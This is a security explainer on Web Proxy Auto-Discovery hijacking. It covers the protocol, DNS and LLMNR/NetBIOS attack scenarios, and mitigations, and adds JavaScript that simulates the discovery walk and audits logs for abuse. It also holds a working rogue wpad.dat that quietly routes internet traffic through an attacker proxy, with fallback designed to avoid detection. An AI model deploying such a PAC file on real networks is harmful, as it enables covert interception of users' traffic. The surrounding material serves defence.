
WPAD - Web Proxy Auto-Discovery

The WPAD protocol is a mechanism by which web clients locate a proxy auto-configuration (PAC) file, conventionally named wpad.dat, to learn which proxy server they should use on the current network.



Supported browsers:

  • Microsoft Internet Explorer
  • Mozilla Firefox
  • Google Chrome
  • Apple Safari
A WPAD client can obtain the PAC file location through any of the following methods:
  1. From the DHCP server (option 252).
  2. A DNS query.
  3. A WINS query.
  4. An LLMNR multicast query.
  5. A NetBIOS name broadcast.
  6. The local hosts file.
  7. The local LMHOSTS file.
If WPAD is used, the PAC file must meet the following requirements:

  • When the location is learned through DNS, the file must be served from the root of that host's web server, i.e. http://wpad.<domain>/wpad.dat (a DHCP-supplied location is a full URL and can point anywhere).
  • The file name must be wpad.dat.

To conduct the attack successfully an attacker needs:
  • A specially crafted PAC file on a web server the attacker controls.
  • A rogue proxy server controlled by the attacker.
  • Tools: an SSL session hijacker, a network packet analyser, etc.
Vulnerability: the weakest part of WPAD is the discovery process itself. None of the discovery methods above authenticates who answers, so whichever party first claims the name "wpad" (a rogue DHCP server, the registrant of a DNS name, or a host on the same segment answering LLMNR/NetBIOS) decides which proxy every client on that network will use.

Discovery process: if the host's name is ltp.us.company.com, the DNS lookups are made in the following order:

  1. wpad.us.company.com
  2. wpad.company.com
  3. wpad.com
The client strips one label at a time and stops at the first name that resolves and serves a wpad.dat. The last step is the dangerous one: a client that walks all the way up to the public top-level domain asks for a name anyone can register, so the PAC file (and therefore the proxy) for every such client is decided by whoever owns that registration. A WPAD client should stop before the top-level domain, which is why the next-to-last name in the walk is the one an internal administrator must own.
Attack scenario using DNS

The attacker arranges to answer the DNS query for one of the wpad names in the walk above, either by registering the public name the client falls through to or by registering or spoofing a wpad record inside the internal zone. The client fetches the attacker's wpad.dat and from then on sends its web traffic through the rogue proxy.

Attack scenario using NetBIOS/LLMNR

When no DNS name resolves, the client falls back to an LLMNR multicast query and a NetBIOS broadcast for the single-label name "wpad". Any host on the same segment can answer first, claim the name, serve its own wpad.dat and become the proxy, without touching DNS at all.

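The discovery walk and the crafted PAC file, as an added example that is not part of the original post. The internal domain company.com, the rogue proxy address 10.0.0.66:3128 and the helper functions are assumptions for the demo; the three PAC helpers are a minimal re-implementation of the standard PAC API so that the file can be evaluated in Node without a browser.

```javascript
// Added example, not code from the original post.
// Part 1: the DNS walk a WPAD client performs for a host FQDN.
// `minLabels` is how many labels must remain when the walk stops: 2 keeps the
// queries inside company.com, 1 reproduces the legacy behaviour that also asks
// the public top-level name (wpad.com), which anyone can register.
function wpadCandidates(fqdn, minLabels = 2) {
  const labels = fqdn.toLowerCase().split('.').filter(Boolean);
  const names = [];
  for (let drop = 1; labels.length - drop >= minLabels; drop++) {
    names.push(['wpad', ...labels.slice(drop)].join('.'));
  }
  return names;
}

// Part 2: a minimal stand-in for the PAC helper API that browsers expose to
// wpad.dat (assumption: only the three helpers the sample file below uses).
const pacHelpers = {
  isPlainHostName: (host) => !host.includes('.'),
  dnsDomainIs: (host, domain) => host.toLowerCase().endsWith(domain.toLowerCase()),
  shExpMatch: (str, pattern) => {
    // Shell-style glob: '*' and '?' are wildcards, everything else is literal.
    const re = pattern
      .replace(/[.+^${}()|[\]\\]/g, '\\$&')
      .replace(/\*/g, '.*')
      .replace(/\?/g, '.');
    return new RegExp(`^${re}$`).test(str);
  },
};

// Evaluate a PAC file the way a client does: load it, then call
// FindProxyForURL(url, host) and use the returned proxy string.
function evaluatePac(pacSource, url, host) {
  const helperNames = Object.keys(pacHelpers);
  const run = new Function(...helperNames, 'url', 'host',
    `${pacSource}\nreturn FindProxyForURL(url, host);`);
  return run(...helperNames.map((n) => pacHelpers[n]), url, host);
}

// A constructed rogue wpad.dat. It is deliberately selective: internal traffic
// goes DIRECT so nothing looks broken to the user, internet-bound HTTP/HTTPS goes
// through the attacker's proxy (10.0.0.66:3128 is an assumed address), and the
// trailing "; DIRECT" makes the client silently bypass the proxy if that box
// disappears, so the victim never sees an error.
const ROGUE_PAC = `
function FindProxyForURL(url, host) {
  if (isPlainHostName(host) || dnsDomainIs(host, ".company.com")) {
    return "DIRECT";
  }
  if (shExpMatch(url, "http*://*")) {
    return "PROXY 10.0.0.66:3128; DIRECT";
  }
  return "DIRECT";
}`;

function resolveWithRoguePac(url, host) {
  return evaluatePac(ROGUE_PAC, url, host);
}

// Demo output.
console.log(wpadCandidates('ltp.us.company.com', 1)); // legacy walk, reaches wpad.com
console.log(wpadCandidates('ltp.us.company.com'));    // stops before the TLD
for (const [url, host] of [
  ['http://intranet/', 'intranet'],
  ['https://mail.company.com/', 'mail.company.com'],
  ['https://bank.example/login', 'bank.example'],
]) {
  console.log(url, '->', resolveWithRoguePac(url, host));
}
```

The selective PAC is the point: a file that proxies everything would be noticed as soon as the attacker's box went down, whereas this one leaves intranet traffic untouched and degrades to DIRECT, so the only observable symptom is that internet-bound requests pass through 10.0.0.66 while it is up.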
Services that use WPAD regardless of IE settings

  • Windows Update service
  • Microsoft CryptoAPI, when it fetches CRLs or root CA certificates
  • Microsoft Firewall Client for ISA Server, with certain settings.
Note: Windows Update and CryptoAPI only accept signed data, so a rogue proxy cannot feed them forged content and they are not vulnerable to a man-in-the-middle attack in that sense. The attack above can still break them, though: the proxy can block or delay update and CRL downloads, which makes those services fail or behave incorrectly.

Solutions:
  1. Configure firewalls and proxies to log, and where possible block, outbound requests for wpad.dat files, so that a client walking out to a public wpad host is both visible and stopped.
  2. Consider disabling automatic proxy discovery/configuration in browsers and operating systems unless those systems will only ever be used on internal networks.
  3. Configure internal DNS servers to respond authoritatively to queries for internal top-level names, so that lookups such as wpad.<internal zone> never leave the organisation.
  4. Distribute the PAC file location through Group Policy instead of relying on discovery.
  5. Allow only secure (authenticated) dynamic updates on internal DNS servers, so that an arbitrary host cannot register the name wpad itself.
  6. Create a DNS sinkhole entry for wpad in every internal zone, pointing at an address you control, so the discovery walk never gets past your own namespace. Two caveats: Windows DNS Server keeps wpad in its global query block list by default and will not answer for that name, even if a record exists, until the name is removed from the list; and a name that goes unanswered makes the client fall back to LLMNR and NetBIOS, so disable those protocols on the hosts as well.
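The logging control from solution 1 and the pinned-address check from solution 6, run offline over constructed log lines, as an added example that is not part of the original post. The log formats, the approved PAC host wpad.company.com, the pinned address 10.0.0.10 and all client and answer addresses are assumptions for the demo.

```javascript
// Added example, not code from the original post. Audits two constructed log
// sources for signs of WPAD abuse: proxy/firewall access logs (who fetched a
// wpad.dat, and from where) and DNS query logs (which wpad names were asked
// for, and what answered). Names and addresses are assumptions for the demo.

// The one host allowed to serve the PAC file, the address its wpad record is
// pinned to (a real PAC server or a sinkhole), and the zones whose wpad names
// are ours to answer.
const APPROVED_PAC_HOST = 'wpad.company.com';
const PINNED_WPAD_ADDR = '10.0.0.10';
const INTERNAL_ZONES = ['company.com'];

// Constructed access-log lines: "<time> <client> <method> <url> <status>".
const PROXY_LOG = [
  '2024-03-01T10:02:11Z 10.1.4.22 GET http://wpad.company.com/wpad.dat 200',
  '2024-03-01T10:02:15Z 10.1.4.31 GET http://wpad.com/wpad.dat 200',
  '2024-03-01T10:02:16Z 10.1.4.31 GET http://www.example.org/index.html 200',
  '2024-03-01T10:02:20Z 10.1.4.40 GET http://10.1.4.99/wpad.dat 200',
];

// Constructed DNS query-log entries: the name asked for and the address returned.
const DNS_LOG = [
  { client: '10.1.4.22', qname: 'wpad.company.com', answer: '10.0.0.10' },
  { client: '10.1.4.31', qname: 'wpad.com', answer: '203.0.113.7' },
  { client: '10.1.4.40', qname: 'wpad.company.com', answer: '10.1.4.99' },
  { client: '10.1.4.50', qname: 'www.company.com', answer: '10.0.0.20' },
];

// Solution 1: every wpad.dat fetch that did not go to the approved host is a
// finding, whether the client walked out to a public name or was pointed at a
// random internal box by a spoofed answer.
function auditPacFetches(lines, approvedHost = APPROVED_PAC_HOST) {
  const findings = [];
  for (const line of lines) {
    const [, client, , url] = line.trim().split(/\s+/);
    let parsed;
    try { parsed = new URL(url); } catch { continue; } // skip unparsable lines
    if (!parsed.pathname.toLowerCase().endsWith('/wpad.dat')) continue;
    if (parsed.hostname.toLowerCase() === approvedHost) continue;
    findings.push({ client, host: parsed.hostname,
      reason: 'wpad.dat fetched from an unapproved host' });
  }
  return findings;
}

// Solution 6: a wpad lookup is healthy only if it stayed inside our zones and
// came back with the pinned address. Anything else means the discovery walk
// escaped our namespace or someone else answered for our name.
function auditWpadDns(entries, zones = INTERNAL_ZONES, pinned = PINNED_WPAD_ADDR) {
  const findings = [];
  for (const { client, qname, answer } of entries) {
    const q = qname.toLowerCase();
    if (q !== 'wpad' && !q.startsWith('wpad.')) continue;
    const internal = zones.some((z) => q.endsWith(`.${z.toLowerCase()}`));
    if (!internal) {
      findings.push({ client, qname: q, reason: 'wpad lookup outside the internal zones' });
    } else if (answer !== pinned) {
      findings.push({ client, qname: q, reason: `internal wpad name answered with ${answer}` });
    }
  }
  return findings;
}

console.log(auditPacFetches(PROXY_LOG));
console.log(auditWpadDns(DNS_LOG));
```

In the sample data the two audits corroborate each other: 10.1.4.40 received 10.1.4.99 as the answer for wpad.company.com and then fetched wpad.dat from that address, which is the signature of a spoofed internal answer, while 10.1.4.31 walked out to wpad.com and fetched the file from the public host, which is the case the outbound block is meant to stop.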